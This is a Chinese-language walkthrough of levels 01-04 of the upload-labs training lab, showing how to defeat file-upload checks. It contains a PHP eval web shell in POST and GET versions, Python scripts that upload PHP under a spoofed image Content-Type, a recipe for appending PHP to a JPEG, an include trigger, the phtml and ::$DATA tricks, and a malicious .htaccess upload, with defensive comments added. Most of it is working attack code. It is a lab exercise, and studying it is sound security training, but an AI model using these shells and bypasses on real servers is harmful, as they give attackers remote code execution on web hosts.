upload-labs文件上傳01-04

upload-labs

01 前端js繞過

ctrl+u查看源碼

// Client-side pre-check wired to the upload form (the lab page's own
// source, reproduced as-is).  It runs only in the visitor's browser, so
// nothing it rejects is actually prevented from reaching the server; the
// server needs its own validation of the stored file.
function checkFile() {
        var file = document.getElementsByName('upload_file')[0].value;
        if (file == null || file == "") {
            alert("請選擇要上傳的文件!");
            return false;
        }
        // Allowed upload extensions, joined with "|"
        var allow_ext = ".jpg|.png|.gif";
        // Extract the extension of the chosen file (text from the last ".")
        var ext_name = file.substring(file.lastIndexOf("."));
        // Check whether the extension is allowed.
        // NOTE(review): indexOf is a substring search over the joined list,
        // not an exact comparison with each entry, and it is case-sensitive.
        if (allow_ext.indexOf(ext_name) == -1) {
            var errMsg = "該文件不允許上傳,請上傳" + allow_ext + "類型的文件,當前文件類型爲:" + ext_name;
            alert(errMsg);
            return false;
        }
    }

var allow_ext = ".jpg|.png|.gif";改爲var allow_ext = ".jpg|.png|.gif|.php";,用chrome瀏覽器,F12打開dev tool,在console裏黏貼checkFile函數,執行checkFile即可上傳php。

<!-- test.php -->
<?php
// Lab test file: evaluates the POST field "cmd" as PHP.  If a file like
// this ends up executable under the web root, the upload check has already
// failed; storing uploads outside the document root, or serving that
// directory with script execution disabled, removes the impact.
@eval($_POST['cmd']);
?>

02 MIME繞過(1)

服務端的 MIME 類型檢測,實際上只是檢查請求中 Content-Type 欄位的內容,而這個欄位是由客戶端自行填寫的

Content-Type: application/octet-stream
Content-Type: image/jpeg

抓取正常的圖片流量,與源碼對比

抓包
Content-Disposition: form-data; name="upload_file"; filename="test.jpg"
Content-Type: image/jpeg
Content-Disposition: form-data; name="submit"
ctrl+u:源碼
<input class="input_file" type="file" name="upload_file"/>
<input class="button" type="submit" name="submit" value="上傳"/>

python3 requests.post 的 files 參數如下

# Shape of the `files` argument for requests.post: each value is
# (remote filename, file object, Content-Type); a plain form field is
# given as (None, value) so that no filename= attribute is sent for it.
files = {
            "upload_file" : ("test33.jpg", open(lfile, "rb"), "image/png"),
            "submit": (None, lfile)
            }
# test33.jpg: remote filename; lfile: local filename. In the captured
# request the "submit" part has nothing after filename="...", so None goes there.

繞過代碼:

#coding:utf-8
import requests

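def upload_img(lfile,url):
    """POST *lfile* to the lab's upload form as a multipart request.

    The file part is sent under the remote name "test33.php" with a
    client-chosen Content-Type of image/png; as the section text notes,
    the Pass-02 check looks only at that header, which the client
    controls.  A server-side check has to look at the stored extension
    and content instead of the declared type.

    Args:
        lfile: path of the local file to send.
        url: upload endpoint.

    Prints the response body, or the exception text if the request fails
    (best-effort script; nothing is raised).
    """
    try:
        # `with` releases the handle on every exit path; the original
        # left the opened file to the garbage collector.
        with open(lfile, "rb") as fh:
            # (remote filename, file object, declared MIME type); the plain
            # "submit" field uses (None, value) so no filename is attached.
            files = {
                "upload_file": ("test33.php", fh, "image/png"),
                "submit": (None, lfile),
            }
            req = requests.post(url, files=files)
        print(req.text)
    except Exception as e:
        # Deliberate best-effort behaviour: report and return.
        print(str(e))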

if __name__ == '__main__':
    # Local file to send and the Pass-02 endpoint of the author's lab instance.
    target_url = 'http://192.168.22.130/upload-labs-master/Pass-02/index.php'
    upload_img('test.php', target_url)

02 MIME繞過(2)

生成圖片木馬

cmd運行convert.bat

rem convert.bat
rem Concatenate test.jpg (binary, /b) and test.php (ASCII, /a) into
rem test2.jpg: the output begins with the image bytes and ends with the
rem PHP source. The Python convert2img() further down does the same job.
copy test.jpg/b+test.php/a test2.jpg
pause
rem a => ascii, b => binary
<!-- test.php -->
<?php
// Same as the test.php in section 01, but reading the GET parameter so it
// can be triggered from the URL shown below.  For a defender, a file
// containing eval() of a request parameter inside an upload directory is
// a standard thing to alert on.
@eval($_GET['cmd']);
?>

激活test2.jpg包含的php code
需要用一個 php 檔(test2.php)去 include test2.jpg:

<?php
// test2.php: `include` parses the target for PHP tags regardless of its
// extension, so the PHP appended to test2.jpg runs.  Server side, the
// fix is never to include user-uploaded or user-named files.
include 'test2.jpg'
?>

執行

http://$uri/test2.php?cmd=phpinfo();

python 3:

#coding:utf-8
import requests

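def convert2img(file_img, file_php, target):
    """Write *target* as the bytes of *file_img* followed by the bytes of *file_php*.

    Python counterpart of the convert.bat step above.  Because the result
    starts with the image's own bytes, a server check that only inspects
    the leading bytes (magic number) cannot distinguish it from the
    image; re-encoding uploads or serving them from a non-executing
    location is the mitigation.

    Args:
        file_img: path of the image, read first.
        file_php: path of the file whose bytes are appended.
        target: output path; created or truncated.

    Any exception (missing input, unwritable target) is printed with a
    "[-]: " prefix rather than propagated, as in the original.
    """
    try:
        # Context managers close all three handles on every exit path; the
        # original leaked them whenever an open() or write() raised.
        with open(file_img, 'rb') as img, open(file_php, 'rb') as php, \
                open(target, 'wb') as out:
            out.write(img.read())
            out.write(php.read())
    except Exception as e:
        print('[-]: ' + str(e))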

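def upload_img(lfile,url):
    """POST *lfile* to the lab's upload form under the remote name "test2.jpg".

    The part carries a client-chosen Content-Type of image/png; the
    Pass-02 check described in this section trusts that header.  Prints
    "[+]: upload success" when the server answers 200; on any exception
    prints "[-]: upload failed" and the exception text (best-effort, nothing
    is raised).  A 200 status only says the request completed, not that the
    file was accepted.

    Args:
        lfile: path of the local file to send.
        url: upload endpoint.
    """
    try:
        # `with` closes the handle even if requests.post raises.
        with open(lfile, "rb") as fh:
            # (remote filename, file object, declared MIME type); the plain
            # "submit" field uses (None, value) so no filename is attached.
            files = {
                "upload_file": ("test2.jpg", fh, "image/png"),
                "submit": (None, lfile),
            }
            req = requests.post(url, files=files)
        if req.status_code == 200:
            print("[+]: upload success")
    except Exception as e:
        # Deliberate best-effort behaviour: report and return.
        print("[-]: upload failed")
        print(str(e))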

if __name__ == '__main__':
    # Build test2.jpg from the image and the PHP file, then send it to Pass-02.
    combined = 'test2.jpg'
    convert2img('test.jpg', 'test.php', combined)
    upload_img(combined, 'http://192.168.22.130/upload-labs-master/Pass-02/index.php')

03 mime.types

// Server-side snippet quoted in this section: drop the literal ::$DATA from the extension.
$file_ext = str_ireplace('::$DATA', '', $file_ext);
// On Windows/NTFS, "name::$DATA" is alternate-data-stream syntax for the
// file's default stream: whatever follows ::$DATA is treated as a stream
// name, so a suffix check that did not strip it would be looking at the
// wrong text while the file is still written as "name".

Apache有解析漏洞,文件在/etc/mime.types
application/x-httpd-php          phtml pht php
上傳phtml文件

04 .htaccess

Apache配置:
/etc/apache2/apache2.conf
AllowOverride All

Apache加載mod_rewrite模塊
cp /etc/apache2/mods-available/rewrite.load /etc/apache2/mods-enabled/rewrite.load

rewrite.load內容:
LoadModule rewrite_module /usr/lib/apache2/modules/mod_rewrite.so

systemctl restart apache2
httpd配置:
/etc/httpd/conf/httpd.conf
AllowOverride All

/etc/httpd/conf.modules.d/00-base.conf
LoadModule rewrite_module /usr/lib/apache2/modules/mod_rewrite.so

systemctl restart httpd.service
#coding:utf-8
import requests
import time
# Base URL of the author's lab instance (private-network address); the
# Pass-04 path is appended in the __main__ block below.
URL = 'http://192.168.22.130/000/upload-labs-master'

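def upload_img(lfile,url):
    """POST *lfile* to the Pass-04 upload form under the remote name "pass-04.jpg".

    Prints "[+]: upload success" when the server answers 200; on any
    exception prints "[-]: upload failed" and the exception text
    (best-effort, nothing is raised).  A 200 status only means the request
    completed, not that the file was stored.

    Args:
        lfile: path of the local file to send.
        url: upload endpoint.
    """
    try:
        # `with` closes the handle even if requests.post raises.
        with open(lfile, "rb") as fh:
            # (remote filename, file object, declared MIME type); the plain
            # "submit" field uses (None, value) so no filename is attached.
            files = {
                "upload_file": ("pass-04.jpg", fh, "image/png"),
                "submit": (None, lfile),
            }
            req = requests.post(url, files=files)
        if req.status_code == 200:
            print("[+]: upload success")
    except Exception as e:
        # Deliberate best-effort behaviour: report and return.
        print("[-]: upload failed")
        print(str(e))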

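def up_htaccess(lfile,url):
    """POST *lfile* to the Pass-04 upload form under the remote name ".htaccess".

    The per-directory config only takes effect because the Apache setup in
    this section uses AllowOverride All; with AllowOverride None (or
    .htaccess disabled for the upload directory) the SetHandler line
    shown below has no effect.  Prints "[+]: upload success" on a 200
    response; on any exception prints "[-]: upload failed" and the
    exception text (best-effort, nothing is raised).

    Args:
        lfile: path of the local .htaccess file to send.
        url: upload endpoint.
    """
    try:
        # `with` closes the handle even if requests.post raises.
        with open(lfile, "rb") as fh:
            # (remote filename, file object, declared MIME type); the plain
            # "submit" field uses (None, value) so no filename is attached.
            files = {
                "upload_file": (".htaccess", fh, "text/plain"),
                "submit": (None, lfile),
            }
            req = requests.post(url, files=files)
        if req.status_code == 200:
            print("[+]: upload success")
    except Exception as e:
        # Deliberate best-effort behaviour: report and return.
        print("[-]: upload failed")
        print(str(e))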

if __name__ == '__main__':
    # The .htaccess is sent first, then the image; the one-second pause
    # between the two requests is kept from the original script.
    endpoint = URL + '/Pass-04/index.php'
    up_htaccess('pass-04.htaccess', endpoint)
    time.sleep(1)
    upload_img('pass-04.jpg', endpoint)
 
 
pass-04.htaccess內容(將文件當成php):
SetHandler application/x-httpd-php